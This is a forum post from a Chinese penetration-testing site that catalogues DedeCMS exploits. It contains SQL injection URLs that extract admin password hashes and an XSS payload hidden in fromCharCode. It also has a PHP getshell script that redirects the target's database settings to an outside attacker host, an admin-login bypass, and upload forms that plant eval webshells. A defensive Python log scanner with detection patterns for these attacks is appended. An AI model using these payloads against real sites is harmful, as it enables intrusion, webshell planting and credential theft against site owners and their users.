中国网络渗透测试联盟
Title: DedeCMS vulnerability summary
Author: admin
Time: 2012-10-18 10:42
Dedecms 5.6 rss.php injection vulnerability

http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
DedeCms v5.6 embedded malicious code execution vulnerability

Register as a member and upload a piece of software; in the "local address" field enter a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}

After it is published, viewing or editing the entry executes the code.

a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}

This generates x.php with password xiao, a one-line shell written in one step.
Dede 5.6 GBK SQL injection vulnerability

http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';

http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe

http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability

http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
DEDECMS all versions gotopage variable XSS vulnerability

1. Copy and paste the URL below into the browser to trigger the XSS and install the XSS rootkit. Note that IE8/9 and similar browsers block URL-based XSS, so the XSS filter has to be turned off.

http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="

2. Close the browser. Whichever of the URLs below you then visit, our XSS fires.

http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda

http://v57.demo.dedecms.com/dede/login.php
DeDeCMS (Zhimeng) variable override getshell

#!/usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author:
www.heixiaozi.com
www.webvul.com
');
echo "\r\n";
if($argv[2]==null){
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
php '.$argv[0].' www.site.com 1 old
+---------------------------------------------------------------------------+
');
exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=$argv[3];
$exp=Getshell($url,$aid,$path);
if (strpos($exp,"OK")>12){
echo "
Exploit Success \n";
if($aid==1)echo "
Shell:".$url."/$path/data/cache/fuck.php\n" ;
if($aid==2)echo "
Shell:".$url."/$path/fuck.php\n" ;
if($aid==3)echo "
Shell:".$url."/$path/plus/fuck.php\n";
}else{
echo "
Exploit Failed \n";
}
function Getshell($url,$aid,$path){
$id=$aid;
$host=$url;
$port="80";
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
//$data .= "Accept-Encoding: gzip,deflate\r\n";
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
$data .= "Connection: keep-alive\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
$data .= $content."\r\n";
$ock=fsockopen($host,$port);
if (!$ock) {
echo "
No response from ".$host."\n";
}
fwrite($ock,$data);
while (!feof($ock)) {
$exp=fgets($ock, 1024);
return $exp;
}
}
?>
DedeCms v5.6-5.7 privilege bypass vulnerability (direct entry to the admin backend)

http://www.ssvdb.com/
[DedeCMS site backend directory]/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

Change validate=dcug above to the current captcha value and you are taken straight into the site backend.

Precondition: the backend path must be known for this to work.
Dedecms (Zhimeng) tag remote file write vulnerability

Precondition: you must prepare your own dede database and insert this row: insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');

Then submit with the form below; the shell is 1.php in the same directory. Work out the principle yourself...

<form action="" method="post" name="QuickSearch" id="QuickSearch">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>
Dedecms <= V5.6 Final template execution vulnerability

1. Register a user, enter the member control panel, publish an article and upload an image; then, in attachment management, replace the image with our crafted template. Suppose the image name is:

uploads/userup/2/12OMX04-15A.jpg

The template content is (if the image format is restricted, prepend gif89a):

{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}

2. Edit the article just published, view the page source, and construct a form:

<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />
<div id="mainCp">
<h3 class="meTitle"><strong>修改文章</strong></h3>
<div class="postForm">
<label>标题:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
<label>标签TAG:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
<label>作者:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
<label>隶属栏目:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>测试栏目</option>
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
<label>我的分类:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>
<label>信息摘要:</label>
<textarea name="description" id="description">1111111</textarea>
(内容的简要说明)
<label>缩略图:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
<input type='text' name='templet' value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields' value="templet,htmltext;">(constructed here)
</div>
<!-- form action area -->
<h3 class="meTitle">详细内容</h3>
<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
<label>验证码:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
<button class="button2" type="submit">提交</button>
<button class="button2 ml10" type="reset">重置</button>
</div>
</div>
</form>

Submit; if it reports that the edit succeeded, we have changed the template path.

3. Visit the edited article:

Assuming the aid of the article just edited is 2, we only need to visit:

http://127.0.0.1/dede/plus/view.php?aid=2

and the webshell 1.php is generated in the plus directory.
DEDECMS website management system Get Shell vulnerability (5.3/5.6)

Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}

Save as 1.gif

<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /><br />
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >更改</button>
</form>

Construct the form above; after the upload the image is saved as /uploads/userup/3/1.gif

Publish an article, then construct the edit form as follows:

<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">提交</button>
</form>
Zhimeng (Dedecms) V5.6 remote file deletion vulnerability

http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
Zhimeng (Dedecms) V5.6 plus/carbuyaction.php local file inclusion vulnerability

http://www.test.com/plus/carbuya
... urn&code=../../
DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability

plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`

The stored password is the 32-character MD5 with the first 5 and the last 7 characters removed, giving a 20-character MD5; to get the 16-character MD5 from it, remove 3 more characters from the front and 1 from the end.
Zhimeng (Dedecms) 5.1 feedback_js.php injection vulnerability

http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
Zhimeng (Dedecms) select_soft_post.php uninitialized page variable vulnerability

<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just a exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>
Zhimeng (dedecms) 5.3 - 5.5 plus/digg_frame.php injection vulnerability

It relies on a MySQL numeric-field overflow that raises an error, combined with DEDECMS writing the database error message into a PHP file whose header performs no check.

1. Visit the URL:

http://www.abc.com/plus/digg_fra
... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>

You can see the error message.

2. Visit http://www.abc.com/data/mysql_error_trace.php; seeing the following confirms the injection succeeded.

int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>

3. Run the file test.html from dede.rar; note that the action address in the form is

<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">

After pressing OK, seeing the message from step 2 means the trojan file was uploaded successfully.
Zhimeng (DedeCms) plus/infosearch.php file injection vulnerability

http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
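The payloads collected in this post share a handful of request-level markers: a GLOBALS override carried in _COOKIE/_POST/_GET parameters, a raw sql= parameter to plus/advancedsearch.php, updatexml( in plus/rss.php, <script in gotopage, ../ in the oldface parameter of edit_face.php, the cfg_* overrides sent to select_soft_post.php, reads of data/mysql_error_trace.php, and union select against feedback_js.php or infosearch.php. As an added example that is not part of the original post or of DedeCMS itself, the Python below URL-decodes Apache combined-format access-log lines and flags requests matching those markers. The log lines, IP addresses and POST body are constructed, and the rule names are my own.

```python
"""Flag access-log requests that match the DedeCMS attack patterns listed in this post.

Added example, not DedeCMS code. Sample log lines, IPs and the POST body below
are constructed; rule names are invented labels for the indicators in the post.
"""
import re
from urllib.parse import unquote_plus

# (rule name, regex over the URL-decoded request target plus optional body)
RULES = [
    ("dedecms_globals_override",
     re.compile(r"_(?:COOKIE|POST|GET)\[GLOBALS\]\[cfg_\w+\]", re.I)),
    ("dedecms_advancedsearch_sql",
     re.compile(r"/plus/advancedsearch\.php\?.*\bsql=", re.I | re.S)),
    ("dedecms_rss_updatexml",
     re.compile(r"/plus/rss\.php\?.*updatexml\s*\(", re.I | re.S)),
    ("dedecms_gotopage_xss",
     re.compile(r"/login\.php\?.*gotopage=[^&]*<script", re.I | re.S)),
    ("dedecms_edit_face_traversal",
     re.compile(r"/member/edit_face\.php\?.*dopost=delold.*oldface=[^&]*\.\./", re.I | re.S)),
    ("dedecms_select_soft_post_cfg",
     re.compile(r"select_soft_post\.php.*\bcfg_(?:basedir|imgtype|softtype|mediatype)=", re.I | re.S)),
    ("dedecms_mysql_error_trace_access",
     re.compile(r"/data/mysql_error_trace\.php", re.I)),
    ("dedecms_union_select_in_plus",
     re.compile(r"/plus/(?:feedback_js|infosearch)\.php\?.*union\s+select", re.I | re.S)),
]

# Apache combined log: client, ident, user, [timestamp], "METHOD target PROTO", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def url_decode(s, rounds=3):
    """Percent-decode repeatedly (bounded) so double-encoded payloads are still visible."""
    for _ in range(rounds):
        decoded = unquote_plus(s)
        if decoded == s:
            break
        s = decoded
    return s


def scan_request(target, body=""):
    """Return the names of every rule matched by one request (target plus optional POST body)."""
    haystack = url_decode(target) + " " + url_decode(body)
    return [name for name, rx in RULES if rx.search(haystack)]


def scan_log(lines):
    """Scan combined-format lines; return (ip, target, matched rule names) for each hit."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line in the expected format; skip it
        names = scan_request(m.group("target"))
        if names:
            hits.append((m.group("ip"), m.group("target"), names))
    return hits


# Constructed sample log lines (the 10.0.0.x clients and the TEST-NET host are made up).
SAMPLE_LOG = [
    '10.0.0.5 - - [18/Oct/2012:10:42:01 +0800] "GET /plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20%60%23@__admin%60 HTTP/1.1" 200 512',
    '10.0.0.6 - - [18/Oct/2012:10:42:02 +0800] "GET /plus/rss.php?tid=1 HTTP/1.1" 200 2048',
    '10.0.0.7 - - [18/Oct/2012:10:42:03 +0800] "GET /dede/login.php?gotopage=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 1024',
    '10.0.0.8 - - [18/Oct/2012:10:42:04 +0800] "GET /member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif HTTP/1.1" 200 0',
    '10.0.0.9 - - [18/Oct/2012:10:42:05 +0800] "GET /data/mysql_error_trace.php HTTP/1.1" 200 77',
    '10.0.0.10 - - [18/Oct/2012:10:42:06 +0800] "GET /dede/login.php?dopost=login&userid=admin&_POST[GLOBALS][cfg_dbhost]=203.0.113.10 HTTP/1.1" 200 300',
]

# Constructed POST body of the kind a proxy or WAF log would record for mytag_js.php.
SAMPLE_POST_BODY = (
    "doaction=http%3A%2F%2Fexample.invalid%2Fplus%2Fmytag_js.php%3Faid%3D1"
    "&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=203.0.113.10&nocache=true"
)

if __name__ == "__main__":
    for ip, target, names in scan_log(SAMPLE_LOG):
        print(ip, ", ".join(names), target, sep="\t")
    print("POST body:", scan_request("/plus/mytag_js.php?aid=1", SAMPLE_POST_BODY))
```

The GLOBALS-override and select_soft_post.php markers usually travel in a POST body, which the combined log format does not record, so scan_request accepts the body separately for logs that carry it. Matching runs on decoded text because the payloads above arrive percent-encoded, and the bounded decode loop keeps double-encoded variants visible without looping forever.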
Welcome to 中国网络渗透测试联盟 (https://cobjon.com/)